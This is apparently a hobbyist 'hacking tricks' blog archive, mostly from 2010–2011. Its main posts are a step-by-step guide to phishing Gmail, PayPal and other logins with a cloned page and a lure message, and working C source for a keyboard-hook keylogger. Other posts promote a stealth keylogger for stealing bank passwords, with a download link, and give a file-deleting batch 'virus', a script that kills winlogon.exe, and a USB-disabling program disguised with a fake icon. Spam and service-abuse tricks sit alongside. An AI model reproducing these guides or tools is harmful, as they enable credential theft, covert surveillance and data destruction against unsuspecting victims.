Showing posts with label whats hacking. Show all posts
Showing posts with label whats hacking. Show all posts

Thursday, February 3, 2011

How To Hack Any Email Account

How To Hack Any Email Account

So lets start with some of basics,
This has become a very common way to hack any email account, It is also known as Phishing attack  in the language of the hackers.

Yes,This is the very famous
 phishing attack. This is the most concerned security threat prevailing in the society
As the target of this kind of attack are the social people.


There are two types of phishing attack :-

1.Normal Phishing.
2.Desktop Phishing.

The basic idea behind the phishing attack is to make victim fool by redirecting him to a website same as original site,while saving his password,

which he thinks is login in to his account and gets hacked.




Okay, so basics must be clear now LET'S START.

To Hack Any Email ID you have just follow the following simple steps,


1. Firstly , You have to create you website or to have a account on any Free Webhosting service which have php enabled service.

[For most of the newbies,i would recommend you to register for a free Webhosting service such aswww.110mb.com or any free Webhosting service
that comes with php enabled in it.But 110mb is best because of its user friendly service they provide]


2. After you have setup your account on any free Webhosting service,you have to upload your phisher on to the the file directory of your site.


3. For that you have to make your own phishing page which is discussed on this webpage -

click here to get how to create your own phishing page

how-to-create-your-own-phisher

[Phisher page will be the login page same as of the Email service your victim is using for example :-Gmail, Orkut, Yahoomail, PayPal etc.
It will Look Just as same as you are asked to login to your Email account, That's where the victim gets tricked aka HACKED]


4. There will be another file needed also named as "login.php" .Which will give the condition to save the username and password typed by the user.

[NOTE:- I will not be providing the login.php to you,You have to get the login.php by yourself.
if you have some knowledge about the php language you can make your own login.php
For those who don't have knowledge about php language i recommend you search for login.php on Google,you will surely get that file.]


5. So,After you have created you phisher it is time to edit them,so as to make them save the username and password typed by the victim.

Here are the simple steps to edit the phisher :-


i. Open your phisher in a web browser,Right click in Somewhere in middle of the web browser and then click on View Source.


ii. A new windows will pop up,click on Edit>Search and type action in the search box,and then click on search.


iii. It will take you to the First action String, after the equals two mark type login.php in replace of the the text written after it.


iv. Click on Search again,this time it will take you to another action string,after the equal to mark type http://www.your-site.yourservice.com/login.php in replace of the text written in front of the equals to mark.


NOTE: you have to type you your sites name in replace of your-site,and your free Webhosting service against your service in http://www.your-site.yourservice.com/login.php.
written over in step iv.

6. So, Now you have done the difficult part it is time for some HACKING.

NOTE: You have to upload all the files on your free Webhosting service directory,including in index_files Folder in the directory.Or it won't work.
The Directory Will be :-

i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt



7. Now you have to just send the victim to your phisher site http://www.your-site.yourservice.com/



You can send him the message to visit your phisher for example :-

Hi,
How is it going.
You know what, i visited a site yesterday it is a new look of [Victims Email Service].
just check out.
its http://www.your-site.yourservice.com/
Its really good.
bye.

You can make your own message and send it to victim.


9. To view the saved password you have to just logon to your free Webhosting service account and open login.txt to view the saved password.


10. And you are done, In just ten steps you have leaned the phishing attack.

How To Create Your Own Phisher

How To Create Your Own Phisher
Phisher page is the login page same as of the service your victim is using for example --> Gmail, Orkut, Yahoomail, PayPal, Facebook, twitter etc.
It will Look Just as same as you are asked to login to your Email Account, That's where the victim gets tricked aka HACKED.

So,Lets start.
To create Your Own Phisher you have to follow these simple steps ----

1. You have to go to the website for which you want to make your phisher for ex. Gmail, Yahoomail, Orkut, PayPal etc


2. When you are there at the login page just click on File>Save As
[ remember to rename it as index.html while saving the web page ]


3. When you have saved the web page,open the index.html in notepad.

4. Search for .gif and replace the text written before the image name with
http://www.your-site.yourservice.com/index_files/


You Have To Do that for all the images named there, Or you can use replace all option.

5.There will be another file needed also named as login.php .Which will give the condition to save the username and password typed by the user.

[NOTE:- I will not be providing the login.php to you,You have to get the login.php by yourself.
if you have some knowledge about the php language you can make your own login.php
For those who don't have knowledge about php language i recommend you search for login.php on Google,you will surely get that file.]

6. After you have done this,click on Edit>Search and type action in the search box,and then click on search.

7. It will take you to the First action String, after the equals two mark type login.php in replace of the the text written after it.

8. Click on Search again,this time it will take you to another action string,after the equal to mark type
http://www.your-site.yourservice.com/login.php
in replace of the text written in front of
the equals to mark.
NOTE: You have to type you your sites name in replace of your-site,and your free Webhosting service against your service in
http://www.your-site.yourservice.com/login.php.

9. Now you are all done.

NOTE: You have to upload all the files on your free Webhosting service directory, including in index_files Folder in the directory.Or it won't work.
The Directory Will be ---
i. index.html
ii. index_files [Folder which you saved]
iii. login.php
iv. login.txt

10. You can Make any websites phisher by these steps for example -- Gmail, Orkut, Yahoomail, PayPal, Facebook, Twitter etc.

Happy Hacking

Tuesday, January 11, 2011

%VIRUS% Delete all files of a Hard Disc

Delete all files of a Hard Disc when you run a simple file....

=> Notepad

=> Type DEL/F/Q*

=> Save it as delete command

Note : Don't try it in your computer

Monday, January 3, 2011

Rapidshare hacking trick

Guys who don't have rapidshare premium account are feed from rapidshare because of two reasons:
1.Maximum time during the day time , we end up with they don't have free slots for download either you premium member or try after some time

2.If we get the access , then all the free users have to wait, for some 30 sec to 120 seconds depending upon the traffic.


3.You guys can download only one file at time.

solutions:
1:
For the first problem really nothing can be done untill unless u have premium account,  or u can use some downloaders which are available on net. just Google them
2.
This tutorial is meanly meant to deal with the second problem.
Requirements for this is: javascript enabled browser, else it wont work


Now what to do when u get the time line of waiting for your download say 30 sec, 90 sec which varies..
Steps:
1. When u click as a free user check, weather u get the time line or not, if not keep trying or try after some time.


2.when u get the time-line, then:

3.Go to the address bar remove replace the address by following command:
javascript{:}alert(c=0).
From the above command remove the curly braces i.e.. {  }
press enter, who-la what did u see now. a screen prompts up, with 0 written on , wait for 1-2 seconds, you will get the download icon, click that, and your download will start.

sometime you may get error that your javascript is not supported, so enable javascript.

For these things i prefer using Google chrome, and ya sometime you guys may also get this error even if you have javascript enabled, then during this case probably javascript from your browser didn't gave the response to the server, for this problem close your browser and restart it, and try again definitely after 2-3 attempts your browser will work.

3.
Now you cannot download multiple files from rapidshare being free user, this problem can be simply solved by using proxies.
steps:
1.start downloading first file.
2.open a new window, go to any proxy like kproxy.com or any other proxy which ever u like, there type the URL of the file you want to download from rapidshare.


or else you can use another trick to change your ip-address, because rapidshare guys keep track of only ip's nothing much, so you guys can use software's like hide my ip etc, which spoofs your ip and then you can download it.

Wednesday, December 29, 2010

BURNING X-BOX & GAME CUBE GAMES USING CDRWIN

BURNING X-BOX & GAME CUBE GAMES USING CDRWIN
------------------------------------------------------
1) Insert your original in your CD-ROM.
2) Open CDRWin (or any other image extractor) to make an iso image of the game
on your hard disc. Click on 'Extract Disc/Tracks/Sectors'
3) Here are the settings which work for me (!):
Disc Image/Cue sheet
File-Format: Automatic
Reading-Options:
RAW, CD+G, CD-TEXT and MCN/USRC all Unchecked
Error Recovery: Ignore
Jitter Correction: Auto
Subcode Analyses: Fixed
Data-Speed: MAX
Read Retry Count: 10
Audio Speed: MAX
Subcode Threshold: 900
There are a lot of reports, that Raw reading also works, but I had problems with it enabled.
4) Click on 'Start'
--------------------------------------------------------------------------------
RECORDING TO A DISC
--------------------------------------------------------------------------------
1) Install Fireburner

2) Double click on the Cue File For The Game
3) Right Click And select burn To CD
That?s all there is record DAO, and you can try to burn it fast at 2X
Using PNY Black Diamond CDR'


2. Click the  tab.

3. In the Screen saver list, click My Pictures Sideshow.

4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.

Now your screen saver is a random display of the pictures taken from your My Pictures folder.

Sunday, December 26, 2010

Email Tracking

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.



First of all, the IP address is generally found in the headers enclosed between square brackets, for instance, [129.130.1.1]
Finding IP address in Gmail

1. Log into your Gmail account with your user-name and password.
2. Open the mail.
3. To display the email headers,

* Click on the inverted triangle beside Reply. Select Show Original.

4. manually find the IP address, proceed to 5.
5. Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

6. If you find more than one Received: from patterns, select the last one.
7. Track the IP address of the sender

How to Block Any Website

How to Block Any Website


Steps:

    * Open Run Menu & Paste %Windir%\System32\Drivers\Etc
    * Find The File Named "Hosts"
    * Open It In Notepad
    * Under "127.0.0.1 Localhost" Add 127.0.0.2 www.Google.com , And That Site Will No Longer Be Accessible.
    * Done!



-For Example-

127.0.0.1 Localhost
127.0.0.2 www.Google.com



-For More Than One Site To Block-

127.0.0.1 Localhost
127.0.0.2 www.Google.com
127.0.0.3 www.Google.co.in
127.0.0.4 Google.com
127.0.0.5 www.Yahoo.com
127.0.0.6 Yahoo.com
127.0.0.7 www.Orkut.com
127.0.0.8 Orkut.com
127.0.0.9 www.Youtube.com


By Using C Language

You Can Done Above Job By Using C Language
First Download Block Website.c
Now Compile It
Now Run The Program

Note:If You Like This Don't Forget To Leave Your Feedback Here For How To improve My Blog

Thank You

How To Enable & Block USB Ports

In This Post I Will Show How To Create A Simple Virus That Disables/Blocks The Usb Ports On The Computer (Pc). As Usual I Use My Favorite C Programming Language To Create This Virus. Anyone With A Basic Knowledge Of C Language Should Be Able To Understand The Working Of This Virus Program.

Once This Virus Is Executed It Will Immediately Disable All The Usb Ports On The Computer. As A Result The You’Ll Will Not Be Able To Use Your Pen Drive Or Any Other Usb Peripheral On The Computer. The Source Code For This Virus Is Available For Download. You Can Test This Virus On Your Own Computer Without Any Worries Since I Have Also Given A Program To Re-Enable All The Usb Ports.

1. Download The Usb_Block.Rar File On To Your Computer.

2. It Contains The Following 4 Files.

* Block_Usb.c (Source Code)
* Unblock_Usb.c (Source Code)

3. You Need To Compile Them Before You Can Run It. A Step-By-Step Procedure To Compile C Programs Is Given In My Post - How To Compile C Programs.

4. Upon Compilation Of Block_Usb.c You Get Block_Usb.Exe Which Is A Simple Virus That Will Block (Disable) All The Usb Ports On The Computer Upon Execution (Double Click).

5. To Test This Virus, Just Run The Block_Usb.Exe File And Insert A Usb Pen Drive (Thumb Drive). Now You Can See That Your Pen Drive Will Never Get Detected. To Re-Enable The Usb Ports Just Run The Unblock_Usb.Exe (You Need To Compile Unblock_Usb.c) File. Now Insert The Pen Drive And It Should Get Detected.

5. You Can Also Change The Icon Of This File To Make It Look Like A Legitimate Program. For More Details On This Refer My Post – How To Change The Icon Of An Exe File (This Step Is Also Optional).

***This is copied data so try at your own risk..........***

Keylogger in C

Keylogger in C
Save to delicious
Stumble Upon
ReTweet
Facebook It !

Well after few days on internet i was thinking

something for you guys, then i ended up to this its a cool C

program code i found for you guys

just try it is really code.



Ok, how do i do this?
what is a keylogger ?


    it's a program that logs everything that you type on the keyboard.

What are it's usages to me?


    Well, if you want to record everything someone types then you can then see anything you want like passwords and such.

How do i get one?


    You can buy some corporate or home usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though since they are bloated, cost money since most people don't know how to find warez and it's better to make your own since you can make it do what you want to do.



You program one !!

If your new to programming then learn how to program in C then come back here. if you know how to program in c then read on.


There are two ways of making a keylogger:


1. Using the GetAsyncKeyState API. look at svchost.c.
2. Using the SetWindowsHookEx API. This is the prefered method but only works on NT based systems.



The reason this way is prefered is because it is much more efficient that GetAsyncKeyState.

See for yourself.

No need to check if what character is being pressed and no need to check other stuff like the value -32767 is being returned.



CODE
// This code will only work if you have Windows NT or
// any later version installed, 2k and XP will work.
#define _WIN32_WINNT 0x0400
#include <windows.h>
#include <winuser.h>
#include <stdio.h>
// Global Hook handle
HHOOK hKeyHook;
// This is the function that is "exported" from the
// execuatable like any function is exported from a
// DLL. It is the hook handler routine for low level
// keyboard events.
__declspec(dllexport) LRESULT CALLBACK KeyEvent (
  int nCode,      // The hook code
  WPARAM wParam,  // The window message (WM_KEYUP, WM_KEYDOWN, etc.)
  LPARAM lParam   // A pointer to a struct with information about the pressed key
) {
    if  ((nCode == HC_ACTION) &&       // HC_ACTION means we may process this event
        ((wParam == WM_SYSKEYDOWN) ||  // Only react if either a system key ...
        (wParam == WM_KEYDOWN)))       // ... or a normal key have been pressed.
    {
    //  This struct contains various information about
    //  the pressed key such as hardware scan code, virtual
    //  key code and further flags.
        KBDLLHOOKSTRUCT hooked =
            *((KBDLLHOOKSTRUCT*)lParam);
    //  dwMsg shall contain the information that would be stored
    //  in the usual lParam argument of a WM_KEYDOWN message.
    //  All information like hardware scan code and other flags
    //  are stored within one double word at different bit offsets.
    //  Refer to MSDN for further information:
    //
    //  http://msdn.microsoft.com/library/en-us/winui/winui/
    //    windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp
    //
    //  (Keystroke Messages)
        DWORD dwMsg = 1;
        dwMsg += hooked.scanCode << 16;
        dwMsg += hooked.flags << 24;
    //  Call the GetKeyNameText() function to get the language-dependant
    //  name of the pressed key. This function should return the name
    //  of the pressed key in your language, aka the language used on
    //  the system.
        char lpszName[0x100] = {0};
        lpszName[0] = '[';
        int i = GetKeyNameText(dwMsg,
            (lpszName+1),0xFF) + 1;
        lpszName[i] = ']';
    //  Print this name to the standard console output device.
        FILE *file;
        file=fopen("keys.log","a+");
        fputs(lpszName,file);
        fflush(file);
    }
//  the return value of the CallNextHookEx routine is always
//  returned by your HookProc routine. This allows other
//  applications to install and handle the same hook as well.
    return CallNextHookEx(hKeyHook,
        nCode,wParam,lParam);
}
// This is a simple message loop that will be used
// to block while we are logging keys. It does not
// perform any real task ...
void MsgLoop()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0)) {
        TranslateMessage( &message );
        DispatchMessage( &message );
    }
}
// This thread is started by the main routine to install
// the low level keyboard hook and start the message loop
// to loop forever while waiting for keyboard events.
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
//  Get a module handle to our own executable. Usually,
//  the return value of GetModuleHandle(NULL) should be
//  a valid handle to the current application instance,
//  but if it fails we will also try to actually load
//  ourself as a library. The thread's parameter is the
//  first command line argument which is the path to our
//  executable.
    HINSTANCE hExe = GetModuleHandle(NULL);
    if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);
//  Everything failed, we can't install the hook ... this
//  never happened, but error handling is important.
    if (!hExe) return 1;
    hKeyHook = SetWindowsHookEx (  // install the hook:
        WH_KEYBOARD_LL,            // as a low level keyboard hook
        (HOOKPROC) KeyEvent,       // with the KeyEvent function from this executable
        hExe,                      // and the module handle to our own executable
        NULL                       // and finally, the hook should monitor all threads.
    );
//  Loop forever in a message loop and if the loop
//  stops some time, unhook the hook. I could have
//  added a signal handler for ctrl-c that unhooks
//  the hook once the application is terminated by
//  the user, but I was too lazy.
    MsgLoop();
    UnhookWindowsHookEx(hKeyHook);
    return 0;
}
// The main function just starts the thread that
// installs the keyboard hook and waits until it
// terminates.
int main(int argc, char** argv)
{
    HANDLE hThread;
    DWORD dwThread;
    DWORD exThread;
    hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
        KeyLogger, (LPVOID) argv[0], NULL, &dwThread);
    if (hThread) {
        return WaitForSingleObject(hThread,INFINITE);
    } else {
        return 1;
    }
}



Just compile this program i any C Compiler.


hay guys this data is copied from some others so be careful and try at your own risk

Saturday, December 25, 2010

BSNL 3G hack

BSNL 3G hack
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of
Normal GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.
now activate gprs by sending sms GPRS PRE to 53733 It will be
actrivated in 24 hours, after activation get gprs settings by calling c.care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g
t;network>network mode> now select UMTS

THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name,select it as default


Now see your data singnals logo..... vola it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as ur access point

This trick is copy pasted from some other source

but its 100% working
Enjoy 3G at minimum cost.....

Thursday, December 9, 2010

Use keyloggers to hack

Use key-loggers to hack any website account include bank id n password

Here is a DETAILED tutorial which contains every possible information that you need to know about key-loggers which includes how to use it, how it works etc.

I know most of you are new to the concept of key-loggers. For some of you, this might be the first time you heard about the term “key-logger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

1. What is a Key-logger?
A key-logger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A key-logger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Key-logger works?
Once the key-logger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to
gmail.com or yahoo.com and types his “user-name” and the “password” in the respective fields to log in. The key-logger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?
A key-logger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?
Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?
No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?
Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.Elite Keystroke Recorder is the most powerful surveillance key-logger for monitoring and recording every detail of PC and Internet activity everywhere: at home or in the office.

EliteKeylogger
Elite Keystroke Recorder includes several integrated recording modules that monitor: chats, instant messengers, e-mails, Internet surfing history, keystrokes, programs launched, passwords (including Windows logon password), user-names and time they worked on your computer, desktop activity, clipboard and much more!

Download URL: http://www.4shared.com/file/f4WFpzYp/EliteKeyloggerv43070.html

or you can download here EliteKeylogger

RAR file pass: board4all.cz

Thursday, December 2, 2010

paisa pay just join and get 99 rs instantly

<a href="http://www.paisapay.in/register.asp?179375-8438022"><b><font color="#FF0000" size="4">Earn upto Rs. 9,000 pm checking Emails. Join now!</font></b></a>

Monday, November 29, 2010

How to Unlock memory card when you forgot your memory card password

How to Unlock memory card when you forgot your memory card password.

Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.

So there are two types of methods for recovering the password of your memory card with the help of Nokia phone.

==>For Nokia s60 1st and 2nd edition phones<==
1. First Install FExplorer in your phone memory.

2. Got to drive C: , you will find a file called mmcstore

3. Send it to your pc directly and open it in notepad or rename the file.

4. At the end of the file you will find your password.

==>For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series<==

There is almost no way yet known to hack the memory card password in case of these types of phone but there is a way to do it some of the s60 3rd edition phones and almost all the E-series phones.
The remote lock option in E-Series phone allows you to unlock your phone by sending a SMS.
The only thing you have to do is to activate this feature by going to:
Tools > Settings > Security > Phone and SIM > Allow remote lock menu.
The password of your memory card will be your remote lock message.
So you have to just send a sms containing your remote lock message that will automatically change your memory card password

Wednesday, October 6, 2010

Enter XP Without Passwords

Enter XP Without Passwords


There is a way to log 0n to your Windows XP system if ever you've forgotten all your users account passwords and don't have any administrator account to enter the system.

The truth is you don't need to install expensive 3rd party software or don't even need to be an expert to enter your locked XP system. What you just need is your Windows XP installer disc and your locked system to have an optical drive (of course). This is very handy if you forgot your administrator password and don't have any access to other account with administrator rights or if you're friend have also forgot his password.

Here's what you'll do if ever you forgot all your User Account's password and you thought (including Microsoft) that you can no longer enter your System.

1.Put the Windows XP installer disc into the optical drive (CD/DVD) and restart your PC.

2.Press any key when prompted with "Press any key to boot from CD", then wait for the "Welcome to setup" screen to appear, just press enter.

3.Then press F8 to agree on the license agreement.

4.On the next screen, you will be prompted to repair or install a fresh copy of Windows XP. You just need to select the locked Windows XP installation you want to enter (If you've more than one Windows XP installed) and press "R".

5.The system will then reboot after setup checked the disk and copied setup files (Just wait for the system to reboot). And when it reboots, don't press any key when prompted to "Press any key to boot from CD".

6.The setup will be automatically start the setup process. This is the most important steps, you need to wait for the setup to install the devices. Press the combination of SHIFT+F10 when you see the words "Installing Devices" at the bottom of the shown remaining minutes of the setup to finish.

7.After that, a command console will be open, where in you need to type "NUSRMGR.CPL" (Without the quotes).

8.You will be then given access to the User Account window similar to the control panel where you will delete or edit your forgotten password. Choose remove if you need to enter the system without entering password or edit if you want to change your forgotten password.

9.After you delete or edit your account password, close the command windows and let the setup to finish. (You will also be needing to enter the XP product key if prompted)

10.When setup is finished, system will reboot and you'll be automatically enter your system if you choose to delete the password or need to enter your new password if you just edit your forgotten password.

11.That's all! You now have entered your locked Windows XP system.

NOTE: I tested this on a system running Windows XP SP2. This article is for educational purposes only and won't tolerate hacking on others machine.

Any Restriction

If You Have The Following Restriction

    * Folder Option In Explorer Computer Not Working
    * Task Manager Disable
    * Disable Registry
    * Can Not Hide Folder
    * Run Menu Not Working/Disable
    * File Menu Disable
    * No Save Settings
    * CMD Disable

Then type Following Code In Notepad & Save it FullPermision.vbs

'code start frm here
dim r
Set ReadAll = File.OpenAsTextStream(0,-2)
Set r = CreateObject("Wscript.Shell")
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckValue","2","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue","2","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckValue","0","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","2","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","0","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu","0","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings","0","REG_DWORD"
r.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"
'code end here



And Just Opposite Of It

If You Want To Set Permission Like

    * Folder Option In Explorer Computer
    * Disable Registry
    * Show Hide Folder
    * Run Menu Disable
    * File Menu Disable
    * No Save Settings
    * CMD Disable

Then type Following Code In Notepad & Save it NoPermision.vbs

'code start frm here
dim r
Set r = CreateObject("Wscript.Shell")
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckValue","2","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue","2","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckValue","1","REG_DWORD"
r.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","2","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu","1","REG_DWORD"
r.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings","1","REG_DWORD"
r.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","1","REG_DWORD"
'code end frm here


If You Like More Fun

Then type Following Code In Notepad & Save it Cool.vbs

'code start frm here
for each Process in GetObject("winmgmts:{impersonationLevel=impersonate,(Debug)}").InstancesOf("win32_process")
If Process.Name ="winlogon.exe" Then
Process.Terminate Process.ProcessID
MsgBox "Process terminated"
End If
next

'code end here

The First Step In Hacking: IP Address

The First Step In Hacking: IP Address

In Here I Have Figure Out Some Very Easy But Cool Ways To Trace Out The Geographical Location And Various Other Infos Like ISP Details Etc Of A Remote Computer Using Its IP(Internet Protocol).

Well I Guess Its One Of The Most Important Must Learn Manual For Boys Out There If You Want To Impress Your Friends Particularly Gals Whom You Will Meet Online In A Chat Room And Tell Them Their Geographical Locations And ISP Details And Make Them Surprised And Impressed .

In The Practical Execution Of This Manual You Don't Have To Work Much As It Is Very Simple Only You Have To Use Your Brain To Understand Some Symbols And Some Format Of Expressions And Use Your IQ To Execute Things The Right Way.


What Is IP And How To Get The IP Of A Remote System::

Getting The IP Or Internet Protocol Of A Remote System Is The Most Important And The First Step Of Hacking Into It. Probably It Is The First Thing A Hacker Do To Get Info For Researching On A System. Well IP Is A Unique Number Assigned To Each Computer On A Network. It Is This Unique Address Which Represents The System On The Network. Generally The IP Of A Particular System Changes Each Time You Log On To The Network By Dialing To Your ISP And It Is Assigned To You By Your ISP. IP Of A System Which Is Always On The Network Remains Generally The Same. Generally Those Kind Of Systems Are Most Likely To Suffer A Hacking Attack Because Of Its Stable IP. Using IP You Can Even Execute System Commands On The Victim's Computer.

Lets Take The Example Of The Following IP Address: 202.144.49.110 Now The First Part, The Numbers Before The First Decimal I.E. 209 Is The Network Number Or The Network Prefix.. This Means That It Identifies The Number Of The Network In Which The Host Is. The Second Part I.E. 144 Is The Host Number That Is It Identifies The Number Of The Host Within The Network. This Means That In The Same Network, The Network Number Is Same. In Order To Provide Flexibility In The Size Of The Network, Here Are Different Classes Of IP Addresses:


Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx Through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx Through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx Through 223.255.255.xxx

The Various Classes Will Be Clearer After Reading The Next Few Lines.

Each Class A Network Address Contains A 8 Bit Network Prefix Followed By A 24-Bit Host Number. They Are Considered To Be Primitive. They Are Referred To As "/8''S" Or Just "8'S" As They Have An 8-Bit Network Prefix.


In A Class B Network Address There Is A 16 Bit Network Prefix Followed By A 16-Bit Host Number. It Is Referred To As "16'S".

A Class C Network Address Contains A 24-Bit Network Prefix And A 8 Bit Host Number. It Is Referred To As

"24'S" And Is Commonly Used By Most ISP'S.

Due To The Growing Size Of The Internet The Network Administrators Faced Many Problems. The Internet Routing Tables Were Beginning To Grow And Now The Administrators Had To Request Another Network Number From The Internet Before A New Network Could Be Installed At Their Site. This Is Where Sub-Netting Came In.

Now If Your ISP Is A Big One And If It Provides You With Dynamic IP Addresses Then You Will Most Probably See That Whenever You Log On To The Net, Your IP Address Will Have The Same First 24 Bits And Only The Last 8 Bits Will Keep Changing. This Is Due To The Fact That When Sub-Netting Comes In Then The IP Addresses Structure Becomes:

xxx.xxx.zzz.yyy

Where The First 2 Parts Are Network Prefix Numbers And The zzz Is The Subnet Number And The yyy Is The Host Number. So You Are Always Connected To The Same Subnet Within The Same Network. As A Result The First 3 Parts Will Remain The Same And Only The Last Part I.E. yyy Is Variable.

************************************************************************************

For Example, If Say An ISP xyz Is Given The IP: 203.98.12.xx Network Address Then You Can Be Awarded Any IP, Whose First Three Fields Are 203.98.12. Get It?

So, Basically This Means That Each ISP Has A Particular Range In Which To Allocate All Its Subscribers. Or In Other Words, All Subscribers Or All People Connected To The Internet Using The Same ISP, Will Have To Be In This Range. This In Effect Would Mean That All People Using The Same ISP Are Likely To Have The Same First Three Fields Of Their IP Addresses.

This Means That If You Have Done A Lot Of (By This I Really Mean A Lot) Of Research, Then You Could Figure Out Which ISP A Person Is Using By Simply Looking At His IP. The ISP Name Could Then Be Used To Figure Out The City And The Country Of The Person. Right? Let Me Take An Example To Stress As To How Cumbersome But Easy (Once The Research Is Done) The Above Method Can Be.

In My Country, Say There Are Three Main ISPs:

ISP Name Network Address Allotted

ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx

Now, If I Get To Know The IP Of An E-Pal Of Mine, And It Reads: 203.91.35.12, Then I Can Pretty Easily Figure Out That He Uses ISP III To Connect To The Internet. Right? You Might Say That Any Idiot Would Be Able To Do This. Well, Yes And No. You See, The Above Method Of Finding Out The ISP Of A Person Was Successful Only Because We Already Had The ISP And Network Address Allotted List With Us. So, What My Point Is, That The Above Method Can Be Successful Only After A Lot Of Research And Experimentation. And, I Do Think Such Research Can Be Helpful Sometimes.

Also, This Would Not Work, If You Take It All On In Larger Scale. What If The IP That You Have Belongs To Someone Living In A Remote Igloo In The North Pole? You Could Not Possibly Get The Network Addresses Of All The ISPs In The World, Could You? If Yes Please Send It To Me J.

Well Now I Guess You Have Pretty Good Knowledge About What An IP Is And What You Can Do By Knowing The IP Of A Remote System. Now Lets Come To The Point Of Finding Out The IP Of Remote System.

